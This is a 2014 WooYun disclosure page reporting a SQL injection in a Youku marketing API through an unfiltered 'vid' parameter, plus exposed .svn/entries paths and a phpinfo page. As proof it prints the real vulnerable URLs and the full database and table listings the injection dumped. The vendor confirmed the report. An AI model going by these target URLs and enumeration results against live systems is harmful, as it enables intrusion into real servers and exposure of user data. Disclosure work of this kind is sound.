当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-057921

漏洞标题:优酷网sql注射+各种敏感信息泄漏

相关厂商:优酷

漏洞作者: 卡卡

提交时间:2014-04-21 11:44

修复时间:2014-06-05 11:44

公开时间:2014-06-05 11:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-04-21: 细节已通知厂商并且等待厂商处理中
2014-04-21: 厂商已经确认,细节仅向厂商公开
2014-05-01: 细节向核心白帽子及相关领域专家公开
2014-05-11: 细节向普通白帽子公开
2014-05-21: 细节向实习白帽子公开
2014-06-05: 细节向公众公开

简要描述:


刚才网吧没机子,我把一个小学生机子抢了 他说要把我头按在键盘上,我哈哈哈哈哈,就凭fjdnxsbhsdjncbsbdhxbbsjwfujdjwjdshckhlnvsldkhl

详细说明:

sql注射:
注射链接:

http://volvocars.youku.com/api/staples/video-box.php?vid=XNDY5NDUxNDM2


由于对参数vid没过滤,造成sql注射

.png


数据库:

available databases [3]:
[*] db_events
[*] information_schema
[*] test


当前库:db_events
表:

Database: db_events
[242 tables]
+--------------------------+
| 7up_user                 |
| adidas_2010_football     |
| adidas_2011_tvc_info     |
| adidas_comments          |
| aveo_clicks              |
| aveo_comments            |
| aveo_users               |
| background_users         |
| bosideng_1024_users      |
| bosideng_code            |
| bosideng_fake_users      |
| bosideng_photos          |
| bosideng_users           |
| bosideng_video_vote_logs |
| bosideng_videos          |
| bosideng_vote_logs       |
| bsd_kpi_email            |
| bsd_kpi_user             |
| bsd_rt_log               |
| bsd_user                 |
| bugles_videos            |
| casesharing_2013         |
| cgirl2014_awards         |
| cgirl_images             |
| cgirl_users              |
| cgirl_videos             |
| chengxin_news            |
| chery_comments           |
| chery_photo_vote_logs    |
| chery_photos             |
| chery_users              |
| chery_video_vote_logs    |
| chery_videos             |
| cityshow_comment         |
| cityshow_data            |
| cityshow_member          |
| clear_game_log           |
| clear_log                |
| clear_rt_log             |
| clear_users              |
| crowneplaza_register     |
| cruze_images             |
| cruze_users              |
| cruze_videos             |
| deyi_tickets_users       |
| dove_user                |
| dove_video               |
| etam_comment             |
| etam_txt                 |
| fiesta_2011_guestbook    |
| fm_dream                 |
| fm_kpi_member            |
| fm_number                |
| fm_number_bak            |
| fm_number_t              |
| fm_number_test           |
| fm_support_log           |
| fm_user                  |
| fm_vote_log              |
| fm_work                  |
| ford_users               |
| global_accounts          |
| global_china             |
| global_files             |
| global_minisites         |
| global_testing           |
| global_units             |
| greetingcard_params      |
| gucci_comments           |
| gucci_rt_logs            |
| gucci_users              |
| hkdl_users               |
| ht_config                |
| ht_guest                 |
| ht_user                  |
| htc_config               |
| hvsop2013_awards         |
| hvsop_comments           |
| hvsop_live_email         |
| hvsop_resumes            |
| hvsop_users              |
| hvsop_videos             |
| hvsop_vote_logs          |
| icedew_videos            |
| jasmine_comments         |
| jw2ask_marked            |
| jw2ask_plans             |
| jw2ask_questions         |
| jw2ask_same_q            |
| jw2ask_top30_grade_logs  |
| kohler_comments          |
| kohler_mm_awards         |
| kohler_photo_vote_logs   |
| kohler_photos            |
| kohler_prize_logs        |
| kohler_users             |
| kohler_video_vote_logs   |
| kohler_videos            |
| lee_moment_photos        |
| lee_moment_votelog       |
| levis_data               |
| levis_logs               |
| levis_win                |
| loreal_flash_ad          |
| mabelline_users          |
| mamonde_2013_videos      |
| market_huanzhu_votes     |
| marketing_apply_info     |
| marketing_darenxiu       |
| marketing_fashion        |
| marketing_jianjiancao    |
| marketing_kfc_avatar     |
| marketing_kfc_cms        |
| marketing_laifushi       |
| marketing_upload_info    |
| mmd_datas                |
| mql_award                |
| mql_seckill              |
| mql_seckill_bak          |
| mql_seckill_log          |
| nfsq_users               |
| nikegz_comments          |
| nikegz_image             |
| nikegz_pks               |
| nikegz_videos            |
| nivea_answer_logs        |
| nivea_awards             |
| nivea_final_awards       |
| nivea_photos             |
| nivea_question           |
| nivea_users              |
| nivea_vote_logs          |
| onstar_regist            |
| onstar_video             |
| oreo_images              |
| oreo_videos              |
| pepsi_comments           |
| pepsi_ecards             |
| pepsi_media              |
| pepsi_users              |
| pepsi_videos             |
| pepsi_vote_logs          |
| pepsicny_videos          |
| qingyang_comment         |
| qingyang_videos          |
| remyvsop_banner          |
| remyvsop_comment         |
| remyvsop_mobile          |
| remyvsop_news            |
| remyvsop_register        |
| remyvsop_teams           |
| remyvsop_videos          |
| ricola_pincode           |
| ricola_tickets           |
| roewe_comment            |
| roewe_config             |
| roewe_guess              |
| roewe_player             |
| roewe_user               |
| scj_users                |
| sprite_users             |
| sprite_videos            |
| superb_comments          |
| superb_comments_bak      |
| superb_videos            |
| sww_2011_users           |
| sww_2011_videos          |
| unit_cachedata           |
| unit_comments            |
| unit_misc                |
| unit_news                |
| unit_users               |
| unit_videos              |
| unit_visitors            |
| unit_voting              |
| vichy2013_awards         |
| vichy2013_winners        |
| vsop_email               |
| vsop_live_mobile         |
| vsop_loop_videos         |
| vsop_lyp                 |
| vsop_users               |
| vsop_videos              |
| vsop_vote_email          |
| wtcc_2011_guestbook      |
| wtcc_2011_shots          |
| wtcc_2011_users          |
| wzmt_awards              |
| wzmt_awards_bak          |
| wzmt_seckill             |
| wzmt_seckill_log         |
| z_acer_user              |
| z_bwnzb_user             |
| z_eleven_user            |
| z_fanta                  |
| z_fanta_email            |
| z_ferrari                |
| z_ferrero_user           |
| z_huggies                |
| z_huggies_comments       |
| z_k3                     |
| z_k3_user                |
| z_k3_v                   |
| z_lenscrafter_pic        |
| z_lenscrafter_user       |
| z_loreal                 |
| z_market_disney          |
| z_market_topchef         |
| z_proya2011_100          |
| z_proya2011_code         |
| z_proya2011_mblog        |
| z_proya2011_pic          |
| z_proya2011_user         |
| z_proya2011_v2_pic       |
| z_proya2011_v2_user      |
| z_proya_pic              |
| z_proya_user             |
| z_remyclub_comment       |
| z_remyclub_user          |
| z_riich_user             |
| z_sdeer_user             |
| z_sepb_user              |
| z_sgm15th                |
| z_volvo                  |
| z_wp_code                |
| z_young                  |
| z_z_comment              |
| z_z_contact              |
| z_z_contact2             |
| z_z_email                |
| z_z_img                  |
| z_z_luck                 |
| z_z_module_luck          |
| z_z_p                    |
| z_z_txt                  |
| z_z_txt_vote             |
| z_z_v                    |
| z_z_vote                 |
| z_z_vote_id              |
| z_z_vote_ip              |
| zhijue_users             |
| zqbb_videos              |
+--------------------------+


242个表,不难看出信息量有多大了
只是检测,就没继续下去了
svn泄漏:

http://open.youku.com/docs/.svn/entries


http://open.youku.com/assets/.svn/entries


svn1.png

svn2.png

svn3.png

svn4.png

phpinfo: 

http://trt.youku.com/index.php

phpinfo.png


漏洞证明:

.png


数据库:

available databases [3]:
[*] db_events
[*] information_schema
[*] test


当前库:db_events
表:

Database: db_events
[242 tables]
+--------------------------+
| 7up_user                 |
| adidas_2010_football     |
| adidas_2011_tvc_info     |
| adidas_comments          |
| aveo_clicks              |
| aveo_comments            |
| aveo_users               |
| background_users         |
| bosideng_1024_users      |
| bosideng_code            |
| bosideng_fake_users      |
| bosideng_photos          |
| bosideng_users           |
| bosideng_video_vote_logs |
| bosideng_videos          |
| bosideng_vote_logs       |
| bsd_kpi_email            |
| bsd_kpi_user             |
| bsd_rt_log               |
| bsd_user                 |
| bugles_videos            |
| casesharing_2013         |
| cgirl2014_awards         |
| cgirl_images             |
| cgirl_users              |
| cgirl_videos             |
| chengxin_news            |
| chery_comments           |
| chery_photo_vote_logs    |
| chery_photos             |
| chery_users              |
| chery_video_vote_logs    |
| chery_videos             |
| cityshow_comment         |
| cityshow_data            |
| cityshow_member          |
| clear_game_log           |
| clear_log                |
| clear_rt_log             |
| clear_users              |
| crowneplaza_register     |
| cruze_images             |
| cruze_users              |
| cruze_videos             |
| deyi_tickets_users       |
| dove_user                |
| dove_video               |
| etam_comment             |
| etam_txt                 |
| fiesta_2011_guestbook    |
| fm_dream                 |
| fm_kpi_member            |
| fm_number                |
| fm_number_bak            |
| fm_number_t              |
| fm_number_test           |
| fm_support_log           |
| fm_user                  |
| fm_vote_log              |
| fm_work                  |
| ford_users               |
| global_accounts          |
| global_china             |
| global_files             |
| global_minisites         |
| global_testing           |
| global_units             |
| greetingcard_params      |
| gucci_comments           |
| gucci_rt_logs            |
| gucci_users              |
| hkdl_users               |
| ht_config                |
| ht_guest                 |
| ht_user                  |
| htc_config               |
| hvsop2013_awards         |
| hvsop_comments           |
| hvsop_live_email         |
| hvsop_resumes            |
| hvsop_users              |
| hvsop_videos             |
| hvsop_vote_logs          |
| icedew_videos            |
| jasmine_comments         |
| jw2ask_marked            |
| jw2ask_plans             |
| jw2ask_questions         |
| jw2ask_same_q            |
| jw2ask_top30_grade_logs  |
| kohler_comments          |
| kohler_mm_awards         |
| kohler_photo_vote_logs   |
| kohler_photos            |
| kohler_prize_logs        |
| kohler_users             |
| kohler_video_vote_logs   |
| kohler_videos            |
| lee_moment_photos        |
| lee_moment_votelog       |
| levis_data               |
| levis_logs               |
| levis_win                |
| loreal_flash_ad          |
| mabelline_users          |
| mamonde_2013_videos      |
| market_huanzhu_votes     |
| marketing_apply_info     |
| marketing_darenxiu       |
| marketing_fashion        |
| marketing_jianjiancao    |
| marketing_kfc_avatar     |
| marketing_kfc_cms        |
| marketing_laifushi       |
| marketing_upload_info    |
| mmd_datas                |
| mql_award                |
| mql_seckill              |
| mql_seckill_bak          |
| mql_seckill_log          |
| nfsq_users               |
| nikegz_comments          |
| nikegz_image             |
| nikegz_pks               |
| nikegz_videos            |
| nivea_answer_logs        |
| nivea_awards             |
| nivea_final_awards       |
| nivea_photos             |
| nivea_question           |
| nivea_users              |
| nivea_vote_logs          |
| onstar_regist            |
| onstar_video             |
| oreo_images              |
| oreo_videos              |
| pepsi_comments           |
| pepsi_ecards             |
| pepsi_media              |
| pepsi_users              |
| pepsi_videos             |
| pepsi_vote_logs          |
| pepsicny_videos          |
| qingyang_comment         |
| qingyang_videos          |
| remyvsop_banner          |
| remyvsop_comment         |
| remyvsop_mobile          |
| remyvsop_news            |
| remyvsop_register        |
| remyvsop_teams           |
| remyvsop_videos          |
| ricola_pincode           |
| ricola_tickets           |
| roewe_comment            |
| roewe_config             |
| roewe_guess              |
| roewe_player             |
| roewe_user               |
| scj_users                |
| sprite_users             |
| sprite_videos            |
| superb_comments          |
| superb_comments_bak      |
| superb_videos            |
| sww_2011_users           |
| sww_2011_videos          |
| unit_cachedata           |
| unit_comments            |
| unit_misc                |
| unit_news                |
| unit_users               |
| unit_videos              |
| unit_visitors            |
| unit_voting              |
| vichy2013_awards         |
| vichy2013_winners        |
| vsop_email               |
| vsop_live_mobile         |
| vsop_loop_videos         |
| vsop_lyp                 |
| vsop_users               |
| vsop_videos              |
| vsop_vote_email          |
| wtcc_2011_guestbook      |
| wtcc_2011_shots          |
| wtcc_2011_users          |
| wzmt_awards              |
| wzmt_awards_bak          |
| wzmt_seckill             |
| wzmt_seckill_log         |
| z_acer_user              |
| z_bwnzb_user             |
| z_eleven_user            |
| z_fanta                  |
| z_fanta_email            |
| z_ferrari                |
| z_ferrero_user           |
| z_huggies                |
| z_huggies_comments       |
| z_k3                     |
| z_k3_user                |
| z_k3_v                   |
| z_lenscrafter_pic        |
| z_lenscrafter_user       |
| z_loreal                 |
| z_market_disney          |
| z_market_topchef         |
| z_proya2011_100          |
| z_proya2011_code         |
| z_proya2011_mblog        |
| z_proya2011_pic          |
| z_proya2011_user         |
| z_proya2011_v2_pic       |
| z_proya2011_v2_user      |
| z_proya_pic              |
| z_proya_user             |
| z_remyclub_comment       |
| z_remyclub_user          |
| z_riich_user             |
| z_sdeer_user             |
| z_sepb_user              |
| z_sgm15th                |
| z_volvo                  |
| z_wp_code                |
| z_young                  |
| z_z_comment              |
| z_z_contact              |
| z_z_contact2             |
| z_z_email                |
| z_z_img                  |
| z_z_luck                 |
| z_z_module_luck          |
| z_z_p                    |
| z_z_txt                  |
| z_z_txt_vote             |
| z_z_v                    |
| z_z_vote                 |
| z_z_vote_id              |
| z_z_vote_ip              |
| zhijue_users             |
| zqbb_videos              |
+--------------------------+


242个表,不难看出信息量有多大了
只是检测,就没继续下去了
svn泄漏:

http://open.youku.com/docs/.svn/entries


http://open.youku.com/assets/.svn/entries


svn1.png

svn2.png

svn3.png

svn4.png

phpinfo: 

http://trt.youku.com/index.php

phpinfo.png


修复方案:

你们懂得~~

版权声明:转载请注明来源 卡卡@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2014-04-21 11:46

厂商回复:

修复中,多谢提醒

最新状态:

暂无